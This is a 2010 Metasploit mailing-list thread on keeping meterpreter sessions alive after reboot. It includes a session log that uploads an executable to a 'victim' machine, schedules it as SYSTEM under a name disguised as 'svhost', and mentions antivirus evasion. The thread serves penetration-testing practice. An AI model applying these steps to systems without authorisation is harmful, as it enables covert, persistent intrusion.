Re: A little more about the metsvc service .

["Sherif Eldeeb" <archeldeeb () gmail com>]

"run persistence" is a nice way to make sure your meterpreter will survive a
reboot, but I use it mostly when I have no admin rights, I'm usually using
"run scheduleme" as a backup plan, you have to be admin or SYSTEM, UAC must
be disabled "if Vista" and you have to have a meterpreter.exe file ready to
be uploaded since it won't create one for you on the fly like "run
persistence does, VBS" I really wish there is an option inside "run
scheduleme" to create meterpreter payloads on the fly to save one step, but
no complains, anyway, the good thing is that using this method your
meterpreter session will be always started as "SYSTEM", it will copy the
executable to a temp folder and rename it to something like "svhostXX.exe"
so you have to beware of AVs to make sure that it won't be caught, then
it'll schedule its execution based on the given options in a task named
"syscheckXX", and tells you how to undo the whole thing "thanks HD!", if the
prerequisites of the run scheduleme bothers you, just stick to run
persistence since it works sometimes with normal users "when choosing the
option to run at user login, not system startup":

meterpreter > run scheduleme -h
Scheduleme -- provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

    -c <opt>  Command to execute at the given time. If options for execution
nee
ded use double quotes
    -d        Daily.
    -e <opt>  Executable or script to upload to target host, will not work
with
remote schedule
    -h        Help menu.
    -hr <opt>  Every specified hours 1-23.
    -i        Run command imediatly and only once.
    -l        When a user logs on.
    -m <opt>  Every specified amount of minutes 1-1439
    -o <opt>  Options for executable when upload method used
    -p        Password for account provided.
    -r        Remote Schedule. Executable has to be already on remote target
    -s        At system startup.
    -t <opt>  Remote system to schedule job.
    -u        Username of account with administrative privelages.

meterpreter > run scheduleme -e /root/IA.exe -m 30
[*] Uploading /root/IA.exe....
[*] /root/IA.exe uploaded!
[*] Scheduling command C:\DOCUME~1\victim\LOCALS~1\Temp\svhost60.exe to run
minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck65 /F
meterpreter > 

sherif.

-----Original Message-----
From: framework-bounces () spool metasploit com
[mailto:framework-bounces () spool metasploit com] On Behalf Of Matt Gardenghi
Sent: Wednesday, July 07, 2010 3:44 PM
To: framework () spool metasploit com
Subject: Re: [framework] A little more about the metsvc service .

  My experience with metsvc is that it has a memory leak....  I've had 
it tank multiple systems before I figured that out.  I haven't played 
with it yet, but the supported technique is to use "run persistence."

You might want to look into spending time there instead.

Matt

On 7/7/2010 4:23 AM, ubt wrote:
> What if I insert a small code to ask for a password authentication in
> the _try do block of the server_setup.c beforehand,and one can't install
> the metsvc service again to overwrite an installed metsvc service?
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework